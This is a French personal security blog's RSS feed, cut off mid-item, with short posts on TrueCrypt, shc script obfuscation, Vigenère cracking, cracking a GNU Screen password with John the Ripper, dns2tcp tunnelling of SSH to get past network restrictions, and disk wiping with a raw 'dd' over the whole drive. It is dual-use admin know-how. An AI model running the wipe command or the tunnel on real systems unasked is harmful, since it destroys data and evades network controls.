<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet title="XSL formatting" type="text/xsl" href="http://blog.uggy.org/feed/rss2/xslt" ?><rss version="2.0"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
  <title>Yop - Sécu</title>
  <link>http://blog.uggy.org/</link>
  <description></description>
  <language>fr</language>
  <pubDate>Tue, 19 Aug 2008 12:17:42 +0200</pubDate>
  <copyright></copyright>
  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
  <generator>Dotclear</generator>
  
    
  <item>
    <title>TrueCrypt en version 6.0</title>
    <link>http://blog.uggy.org/post/2008/07/08/TrueCrypt-en-version-60</link>
    <guid isPermaLink="false">urn:md5:9c08805a1466b8801abff3cc7956c6a8</guid>
    <pubDate>Tue, 08 Jul 2008 01:45:00 +0200</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Tout le monde connait le logiciel de chiffrement &lt;a href=&quot;http://www.truecrypt.org&quot;&gt;TrueCrypt&lt;/a&gt;, mais tout le monde ne sait pas encore que la version 6.0 est sortie:)&lt;/p&gt;


&lt;p&gt;&lt;a href=&quot;http://www.truecrypt.org/downloads.php&quot;&gt;Téléchargement&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.truecrypt.org/docs/?s=version-history&quot;&gt;Historique des versions&lt;/a&gt;&lt;/p&gt;


&lt;p&gt;Bon.. j'accède toujours à mes données...c'est déjà çà :)&lt;/p&gt;


&lt;p&gt;&lt;br /&gt;&lt;/p&gt;



&lt;p&gt;PS: Si un lecteur a des billes sur qui est derrière la TrueCrypt Foundation... Il peux poster un commentaire ou me contacter...&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2008/07/08/TrueCrypt-en-version-60#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2008/07/08/TrueCrypt-en-version-60#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/183</wfw:commentRss>
      </item>
    
  <item>
    <title>shc - Generic shell script compiler</title>
    <link>http://blog.uggy.org/post/2008/05/02/shc-Generic-shell-script-compiler</link>
    <guid isPermaLink="false">urn:md5:9494d4b08b210c3dd24f9faf57c6fda5</guid>
    <pubDate>Fri, 02 May 2008 01:15:00 +0200</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;En gros, &lt;a href=&quot;http://www.datsi.fi.upm.es/~frosal/sources/shc.html&quot;&gt;shc&lt;/a&gt; permet de compiler un script shell...et donc d'obtenir un binaire executable (portable avec l'option -r).&lt;br /&gt;
L'avantage principal, c'est surtout qu'il devient plus difficile de &quot;voir&quot; le contenu du script...Cela permet de décourager ou de ralentir les curieux...&lt;br /&gt;
On peut donc l'utiliser par example pour compliquer la lecture des scripts qui contiennent des mots de passe...&lt;/p&gt;


&lt;p&gt;/!\ Il doit être possible avec des debuggers ou des &quot;ps&quot; etc... d'obtenir le code source.. voir même peut être de déterminer la clé de chiffrement...mais disons que c'est toujours un peu mieux que le pass complètement en clair dans le .sh quand il n'y a vraiment pas le choix et que ce n'est pas pour protéger le lançement de missiles nucléaires...
&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;$ sudo apt-get install shc&lt;br /&gt;
$ cat toto.sh&lt;br /&gt;
#!/bin/sh&lt;br /&gt;
echo ataatatataat&lt;br /&gt;
$ shc -r -f toto.sh&lt;br /&gt;
$ ls |grep toto&lt;br /&gt;
toto.sh&lt;br /&gt;
toto.sh.x&lt;br /&gt;
toto.sh.x.c&lt;br /&gt;
$ ./toto.sh.x &lt;br /&gt;
ataatatataat&lt;br /&gt;
$ strings toto.sh.x | grep ataa&lt;br /&gt;
$&lt;/p&gt;&lt;/blockquote&gt;



&lt;p&gt;Plus d'infos sur les limites &lt;a href=&quot;http://www.linuxjournal.com/article/8256&quot;&gt;ici&lt;/a&gt; et &lt;a href=&quot;http://www.usenet-forums.com/linux-administration/126790-shc-protected-shell-script-vulnerable.html&quot;&gt;là&lt;/a&gt;.&lt;/p&gt;


&lt;p&gt;Si quelqu'un a fait des tests de sécurité sur la version 3.8.6...&amp;nbsp;?&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2008/05/02/shc-Generic-shell-script-compiler#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2008/05/02/shc-Generic-shell-script-compiler#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/178</wfw:commentRss>
      </item>
    
  <item>
    <title>Trouver les sites web d'une IP</title>
    <link>http://blog.uggy.org/post/2008/03/22/Trouver-les-sites-web-dune-IP</link>
    <guid isPermaLink="false">urn:md5:5a9a162526624c6676651be226888440</guid>
    <pubDate>Sat, 22 Mar 2008 15:29:00 +0100</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Il n'y a pas de véritable moyens DNS pour déterminer les noms de domaines pointant vers une IP&lt;/p&gt;


&lt;p&gt;Le PTR ne donne pas ce que l'on recherche...&lt;br /&gt;
Les transferts de zones sont heureusement souvent non authorisés et ne donneraient pas tous les résultats (mais que ceux du serveur DNS en question)&lt;br /&gt;
La brute force..on oublie..&lt;/p&gt;


&lt;p&gt;Bref.. Il reste l'indexation faite par les moteurs de recherche...&lt;/p&gt;


&lt;p&gt;www.live.com permet de faire ce type de recherche en utilisant la syntaxe:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;ip:194.109.137.218&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Des sites comme www.myipneighbors.com permet également de faire la même chose.. Ce site ne semble pas tirer ses résultats de  www.live.com...&amp;nbsp;? A t'il ses propres robots de recherche&amp;nbsp;?&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2008/03/22/Trouver-les-sites-web-dune-IP#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2008/03/22/Trouver-les-sites-web-dune-IP#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/175</wfw:commentRss>
      </item>
    
  <item>
    <title>Extensions Firefox Exploit-Me</title>
    <link>http://blog.uggy.org/post/2007/11/27/Extensions-Firefox-Exploit-Me</link>
    <guid isPermaLink="false">urn:md5:74428f53ed04932f6432a4fbc046ead6</guid>
    <pubDate>Tue, 27 Nov 2007 23:55:00 +0100</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Sortie ce matin des nouvelles extensions Exploit-Me:&lt;br /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://www.securitycompass.com/exploit_me/xssme_faq.shtml&quot;&gt;XSS-me&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.securitycompass.com/exploit_me/sqlme_faq.shtml&quot;&gt;SQL Inject-Me&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;On va regarder cela...&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2007/11/27/Extensions-Firefox-Exploit-Me#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2007/11/27/Extensions-Firefox-Exploit-Me#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/169</wfw:commentRss>
      </item>
    
  <item>
    <title>Chiffre de Vigenère</title>
    <link>http://blog.uggy.org/post/2007/07/23/Chiffre-de-Vigenere</link>
    <guid isPermaLink="false">urn:md5:e76a8bdc1eb679ebe0f6a239ab53daba</guid>
    <pubDate>Mon, 23 Jul 2007 21:14:00 +0200</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;ul&gt;
&lt;li&gt;La théorie&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Le &lt;a href=&quot;http://fr.wikipedia.org/wiki/Chiffre_de_Vigen%C3%A8re&quot;&gt;Chiffre de Vigenère&lt;/a&gt; est un système de chiffrement, publié en 1586 par &lt;a href=&quot;http://fr.wikipedia.org/wiki/Blaise_de_Vigen%C3%A8re&quot;&gt;Blaise de Vigenère&lt;/a&gt;.&lt;/p&gt;


&lt;p&gt;Ce système de chiffrement fût une petite révolution et resta &quot;incassable&quot; jusqu'en 1854, année où &lt;a href=&quot;http://fr.wikipedia.org/wiki/Charles_Babbage&quot;&gt;Charles Babbage&lt;/a&gt; en réussit &lt;a href=&quot;http://fr.wikipedia.org/wiki/Cryptanalyse_du_chiffre_de_Vigen%C3%A8re&quot;&gt;la cryptannalyse&lt;/a&gt;.&lt;br /&gt;
Les travaux de Babbage restèrent secret jusqu'au XXème siècle (en effet il travaillait pour le roi... donc on imagine l'intérêt à ne rien révéler), mais la cryptannalyse avait été également réussie et publiée par &lt;a href=&quot;http://fr.wikipedia.org/wiki/Friedrich_Wilhelm_Kasiski&quot;&gt;Friedrich Wilhem Kasinski&lt;/a&gt; en 1863.&lt;/p&gt;


&lt;p&gt;Je laisse le lecteur allez lire comment fonctionne le &lt;a href=&quot;http://fr.wikipedia.org/wiki/Chiffre_de_Vigen%C3%A8re&quot;&gt;chifffrement&lt;/a&gt; et sa &lt;a href=&quot;http://fr.wikipedia.org/wiki/Cryptanalyse_du_chiffre_de_Vigen%C3%A8re&quot;&gt;cryptannalyse&lt;/a&gt;.&lt;/p&gt;


&lt;p&gt;&lt;br /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;La pratique - Chiffrer/Déchiffrer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Un des moyens est d'utiliser &lt;a href=&quot;http://gcipher.sourceforge.net/&quot;&gt;gcipher&lt;/a&gt; qui est utilisable aussi bien en ligne de commande qu'en interface graphique.&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;sudo apt-get install gcipher&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;&lt;img src=&quot;http://img179.imageshack.us/img179/5620/uggygcipheroa1.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;$ gcipher -c Vigenere -k linux&lt;br /&gt;
yes yes yo yo&lt;br /&gt;
jmf sbd gb sl&lt;br /&gt;
$&lt;br /&gt;
$ echo jmf sbd gb sl | gcipher -C Vigenere -k linux&lt;br /&gt;
yes yes yo yo&lt;br /&gt;
$&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;On peut constater que la &quot;force&quot; du chiffre de Vigenère est qu'une même lettre du texte en clair n'est pas chiffrée par la même lettre.&lt;/p&gt;





&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;La pratique - Décrypter&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://smurfoncrack.com/pygenere/&quot; hreflang=&quot;fr&quot;&gt;Simon Liu&lt;/a&gt; à écrit une petite librairie python pour décrypter un texte chiffré en Vigenère. Il est préférable de &quot;deviner&quot; en quelle langue le texte est écrit, et de disposer d'un texte suffisament long pour fournir les répétitions nécessaires...&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;$ cd /usr/include/python2.5/&lt;br /&gt;
$ sudo wget http://smurfoncrack.com/pygenere/pygenere.py&lt;br /&gt;
$ python&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; from pygenere import *&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;On insert la chaine chiffrée:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;&amp;gt;&amp;gt;&amp;gt; encrypted = 'Yfi. 1cf Acg wmabcg cywhqscr si bsbcigcbi jwqpsh ch teojv sc bfdghh.[suite tronquée]&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;On demande à décrypter le texte (on ne connait pas la clé):&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;&amp;gt;&amp;gt;&amp;gt; print VigCrack(encrypted).set_language('FR').crack_message()&lt;br /&gt;
Art. 1er Les hommes naissent et demeurent libres et egaux en droits.[suite tronquée]&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Si on veut afficher la clé:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;&amp;gt;&amp;gt;&amp;gt; print VigCrack(encrypted).set_language('FR').crack_codeword()&lt;br /&gt;
YOPYOP&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; print VigCrack(encrypted).set_language('FR').crack_codeword(3)&lt;br /&gt;
YOP&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; &lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;A noter:&lt;br /&gt;
- J'ai utilisé dans l'exemple ci-dessus uniquement les 2 premiers articles (4 phrases).&lt;/p&gt;


&lt;p&gt;- Même sans préciser la langue (et avec le texte de l'exemple), le texte est correctement décrypté.&lt;/p&gt;


&lt;p&gt;- Avec un texte trop court (uniquement le premier article) nous obtenons tout de même:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;Led romnes natcseot et dpweusent ltlret et eglex eo droiec.&lt;/p&gt;&lt;/blockquote&gt;




&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We Esmqftp hp Vkriyetp rp pgfx oopn tls upvgit oi you usfru asfr esmqftpv oeu xidscrid mctw di kw e eowe hp mgxi ceutwee rcid dg 3 dmpcnpw pt npw ceesiccjpw oe epw 3 nraaxzgtltseu aifvgyx pttp wllwpid :) Mgcgt d cgstr hlme l gqjzrv oi oeeccatgc pl cqygwuutsy dg nie atemnlg ;)&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2007/07/23/Chiffre-de-Vigenere#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2007/07/23/Chiffre-de-Vigenere#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/151</wfw:commentRss>
      </item>
    
  <item>
    <title>Mot de passe pour GNU Screen</title>
    <link>http://blog.uggy.org/post/2007/06/12/Mot-de-passe-pour-GNU-Screen</link>
    <guid isPermaLink="false">urn:md5:17cb0817dc6418409f9d0bea12d9ee3b</guid>
    <pubDate>Tue, 12 Jun 2007 22:27:00 +0200</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;On peut utiliser un mot de passe pour &quot;protéger&quot; l'accès à un &lt;a href=&quot;http://www.gnu.org/software/screen/&quot;&gt;Screen&lt;/a&gt;. (Par exemple dans l'utilisation d'un serveur maintenu par plusieurs administrateurs...)&lt;br /&gt;
La procédure est la suivante:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A l'intérieur d'un screen:&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;Ctrl+a    :password&lt;br /&gt;
&lt;br /&gt;
New screen password:&lt;br /&gt;
Retype new password:&lt;br /&gt;
[ Password moved into copybuffer ]&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Maintenant, on &quot;détache&quot;, et en &quot;réattachant,&quot; le mot de passe sera demandé.&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;Si on veut avoir toujours le même mot de passe (même pour les futures sessions qui n'existent pas encore), il suffit de placer le mot de passe chiffré dans le .screenrc du user.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pour afficher le mot de passe chiffré:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;Ctrl+a    :password&lt;br /&gt;
&lt;br /&gt;
New screen password:&lt;br /&gt;
Retype new password:&lt;br /&gt;
[ Password moved into copybuffer ]&lt;br /&gt;
&lt;br /&gt;
Ctrl+a    ]&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Exemple de .screenrc:&lt;br /&gt;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;password MNp4qLZor0YJw&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Par contre c'est la fonction crypt() qui est utilisée ...donc attention au mot de passe...&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;$ time john -format:DES file&lt;br /&gt;
Loaded 1 password (Standard DES [48/64 4K])&lt;br /&gt;
&lt;strong&gt;toto&lt;/strong&gt;             (user)&lt;br /&gt;
guesses: 1  time: 0:00:00:01 (3)  c/s: 148654  trying: timp2 - maga&lt;br /&gt;
&lt;br /&gt;
real    0m1.158s&lt;br /&gt;
user    0m1.068s&lt;br /&gt;
sys     0m0.020s&lt;br /&gt;
$&lt;/p&gt;&lt;/blockquote&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2007/06/12/Mot-de-passe-pour-GNU-Screen#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2007/06/12/Mot-de-passe-pour-GNU-Screen#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/143</wfw:commentRss>
      </item>
    
  <item>
    <title>dns2tcp - Encapsulation dans des requêtes DNS</title>
    <link>http://blog.uggy.org/post/2007/03/27/dns2tcp-Encapsulation-dans-requetes-DNS</link>
    <guid isPermaLink="false">urn:md5:f250ace245211859a0a1a4ef68daff52</guid>
    <pubDate>Thu, 15 Mar 2007 00:34:00 +0100</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;ul&gt;
&lt;li&gt;Introduction&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://www.hsc.fr/ressources/outils/dns2tcp/download/&quot;&gt;dns2tcp&lt;/a&gt; est un outils permettant d'encapsuler du trafic dans des requêtes DNS.&lt;/p&gt;


&lt;p&gt;La partie serveur simule un serveur DNS (donc doit écouter sur le port 53) et est par exemple à installer sur sa ligne Adsl perso.
Le client encapsule les données dans des requêtes DNS qui sont envoyées au serveur interne spécifié.
Ce serveur DNS qui lui à le plus souvent accès au port 53 vers Internet (ou en tous cas de résoudre des domaines externes), transmet à notre faux serveur DNS les données qui sont ensuite décapsulées.
Le retour des paquets ce fait de la même manière.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Coté DNS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Il est nécessaire d'ajouter une entrée dans les DNS exemple:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;dns2tcp.example.org NS 1.2.3.4&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;C'est en essayant de résoudre des sous domaines de ce nom que les paquets arriveront jusqu'au faux serveur DNS.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Coté serveur&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;&lt;p&gt;cat /etc/dns2tcpd.conf&lt;br /&gt;
listen = 0.0.0.0&lt;br /&gt;
port = 53&lt;br /&gt;
user=nobody&lt;br /&gt;
chroot = /var/empty/dns2tcp/&lt;br /&gt;
domain = dns2tcp.example.org&lt;br /&gt;
ressources = sshYop:127.0.0.1:22&lt;br /&gt;&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Ici nous indiquons qu'une connexion vers le port 22 du même serveur sera accessible sous le nom arbitraire  sshYop&lt;/p&gt;


&lt;p&gt;Lancement du server (ici en mode debug...)&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;sudo dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf&lt;/p&gt;&lt;/blockquote&gt;


&lt;ul&gt;
&lt;li&gt;Coté client&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lister les &quot;connexions disponibles&quot;&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;dns2tcpc -z dns2tcp.example.org 192.168.1.1&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Les paramètres étant le nom de domaine et le serveur DNS accessible (dans l'exemple 192.168.1.1).&lt;/p&gt;


&lt;p&gt;La réponse doit être:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;Available connection(s)&amp;nbsp;: &lt;br /&gt;
sshYop&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Pour monter la connexion &quot;DNS&quot;:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;dns2tcpc -c -r sshYop -l 4430 -z dns2tcp.example.org 192.168.1.1&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Les paquets envoyés vers le port 4430 local seront donc envoyés dans l'exemple au port 22 de la machine dns2tcp.example.org (mais tout ceci uniquement avec des requêtes DNS).&lt;/p&gt;


&lt;p&gt;Pour monter la connexion SSH:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;ssh -p 4430 127.0.0.1&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Du browsing est par exemple possible avec la partie Socks de Ssh:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;ssh -D 3333 -p 4430 127.0.0.1&lt;/p&gt;&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Résumé en image&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;http://img110.imageshack.us/img110/7087/dns2tcpuggymars07kj3.png&quot;&gt;&lt;img src=&quot;http://img110.imageshack.us/img110/7087/dns2tcpuggymars07kj3.th.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/a&gt;&lt;/p&gt;



&lt;ul&gt;
&lt;li&gt;Conclusion&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Ce programme permet donc d'accéder à Internet quand on a seulement le droit d'accéder à un serveur DNS &quot;interne&quot;.&lt;br /&gt;
Les &quot;voyageurs&quot; verront tout de suite l'utilité ;)&lt;/p&gt;


&lt;p&gt;Merci Modu ;)&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2007/03/27/dns2tcp-Encapsulation-dans-requetes-DNS#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2007/03/27/dns2tcp-Encapsulation-dans-requetes-DNS#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/135</wfw:commentRss>
      </item>
    
  <item>
    <title>DBAN - Pour effacer de manière sécurisée un disque dur</title>
    <link>http://blog.uggy.org/post/2007/02/12/DBAN-Pour-effacer-de-maniere-securisee-un-disque-dur</link>
    <guid isPermaLink="false">urn:md5:1f32cde610d96f95a79bd8edfb9ea9dd</guid>
    <pubDate>Mon, 12 Feb 2007 12:33:00 +0100</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;J'avais besoin d'effacer le manière &quot;sécurisée&quot; tout un disque dur... Qui dit disque entier, dit utilisation d'autre chose qu'un &quot;shred&quot; ou un &quot;wipe&quot; qui sont plutôt orientés effacement de fichiers.&lt;/p&gt;


&lt;p&gt;Le temps de trouver un &quot;vrai&quot; soft, j'ai lançé un simple &quot;dd&quot; depuis un LiveCD:&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;dd if=/dev/zero of=/dev/hda&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Cela à pris 14 minutes (disque de 20 Go) ce qui m'a laissé le temps de trouver la solution qui semble être la plus &quot;reconnue&quot;, j'ai nommé  &lt;a href=&quot;http://dban.sourceforge.net&quot;&gt;DBAN&lt;/a&gt;&lt;/p&gt;


&lt;p&gt;DBAN se présente sous la forme d'un media bootable (CD par exemple), on boot dessus, il trouve le ou les disques durs puis les &quot;efface&quot; de manière sécurisée...&lt;/p&gt;


&lt;p&gt;On ne peut jamais être sûr à 100% que des données ne seront pas récupérables, mais cela semble être une des solutions les plus sûres en dehors  d'une destruction physique.&lt;/p&gt;


&lt;blockquote&gt;&lt;p&gt;Q: Are you absolutely sure that DBAN works properly?&lt;br /&gt;
A: No. &lt;br /&gt;
[...]DBAN is &quot;good enough&quot; for &quot;most people&quot;.&lt;/p&gt;&lt;/blockquote&gt;


&lt;p&gt;Plusieurs &quot;normes&quot; d'effacement sont possibles:&lt;br /&gt;
- Canadian RCMP TSSIT OPS-II Standard Wipe&lt;br /&gt;
- American &lt;a href=&quot;http://en.wikipedia.org/wiki/US_DoD_5220-22.M&quot;&gt;DoD 5220-22.M&lt;/a&gt; Standard Wipe&lt;br /&gt;
- &lt;a href=&quot;http://en.wikipedia.org/wiki/Gutmann_method&quot;&gt;Gutmann&lt;/a&gt; Wipe&lt;br /&gt;
- PRNG Stream Wipe&lt;br /&gt;&lt;/p&gt;



&lt;p&gt;Screenshot du &lt;a href=&quot;http://dban.sourceforge.net&quot;&gt;site officiel&lt;/a&gt;:&lt;/p&gt;


&lt;p&gt;&lt;img src=&quot;http://img300.imageshack.us/img300/1522/dbanwa1.png&quot; alt=&quot;&quot; style=&quot;display:block; margin:0 auto;&quot; /&gt;&lt;/p&gt;


&lt;p&gt;Compter environ 1heure pour un disque de 20Go avec l'option par défaut &quot;Autonuke&quot; (3 passes).&lt;/p&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2007/02/12/DBAN-Pour-effacer-de-maniere-securisee-un-disque-dur#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2007/02/12/DBAN-Pour-effacer-de-maniere-securisee-un-disque-dur#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/129</wfw:commentRss>
      </item>
    
  <item>
    <title>Schneier</title>
    <link>http://blog.uggy.org/post/2006/10/22/120-schneier</link>
    <guid isPermaLink="false">urn:md5:519ea928cdce92f8a15c7becf050e420</guid>
    <pubDate>Sun, 22 Oct 2006 01:24:59 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Les &lt;a href=&quot;http://geekz.co.uk/schneierfacts/&quot;&gt;choses que vous ne saviez pas&lt;/a&gt; sur &lt;a href=&quot;http://www.schneier.com/blog/&quot;&gt;Bruce Schneier&lt;/a&gt; :)&lt;/p&gt;



&lt;blockquote&gt;&lt;p&gt;- Bruce Schneier's mail server only sends him the emails' hashes, just to make things a little more interesting for him.&lt;br /&gt;
- Bruce Schneier can decrypt your PKI message with the public key.&lt;br /&gt;
- Bruce Schneier knows Alice and Bob's shared secret.&lt;br /&gt;
- Setting SSID of an open Wi-Fi network to &quot;bruceschneier&quot; makes it completely secure.&lt;br /&gt;
...&lt;/p&gt;&lt;/blockquote&gt;</description>
    
    
    
          <comments>http://blog.uggy.org/post/2006/10/22/120-schneier#comment-form</comments>
      <wfw:comment>http://blog.uggy.org/post/2006/10/22/120-schneier#comment-form</wfw:comment>
      <wfw:commentRss>http://blog.uggy.org/feed/rss2/comments/113</wfw:commentRss>
      </item>
    
  <item>
    <title>Vidéo BlackHat et sécurité Wifi</title>
    <link>http://blog.uggy.org/post/2006/09/26/116-video-blackhat-et-securite-wifi</link>
    <guid isPermaLink="false">urn:md5:445b554ed26ae399924239c58549e5d9</guid>
    <pubDate>Tue, 26 Sep 2006 14:01:01 +0000</pubDate>
    <dc:creator>Yannick</dc:creator>
        <category>Sécu</category>
            
    <description>    &lt;p&gt;Voici un bref résumé de la saga de l'été...&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;August 2-3&lt;/strong&gt; &lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Video présentée à &lt;a href=&quot;http://www.blackhat.com/html/bh-usa-06/bh-usa-06-index.html&quot;&gt;BlackHat&lt;/a&gt; par David Maynor et Johnny Cache&lt;br /&gt;
&lt;a href=&quot;http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Cache.pdf&quot;&gt;Les slides&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://video.google.fr/videoplay?docid=-4415735958080028817&quot;&gt;La video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;August 18&lt;/strong&gt;, 2006&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href=&quot;http://blog.washingtonpost.com/securityfix/2006/08/update_on_the_apple_macbook_cl.html&quot;&gt;Apple indique&lt;/a&gt; que les auteurs de la vidéo ne leur ont pas donné de preuves de problème&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Friday, &lt;strong&gt;1 September&lt;/strong&gt; 2006&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;La véracité de la video est très contreversée un peu partout...&lt;br /&gt;
Exemple:&lt;br /&gt;
&lt;a href=&quot;http://lists.immunitysec.com/pipermail/dailydave/2006-September/003452.html&quot;&gt;An Open Challenge&lt;/a&gt; to David Maynor and Jon Ellch&lt;br /&gt;
et sur &lt;a href=&quot;http://daringfireball.net/2006/09/open_challenge&quot;&gt;son blog&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;


&lt;ul&gt;
&lt;li&gt;Sun &lt;strong&gt;Sep 3&lt;/strong&gt; 14:37:48 EST 2006&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
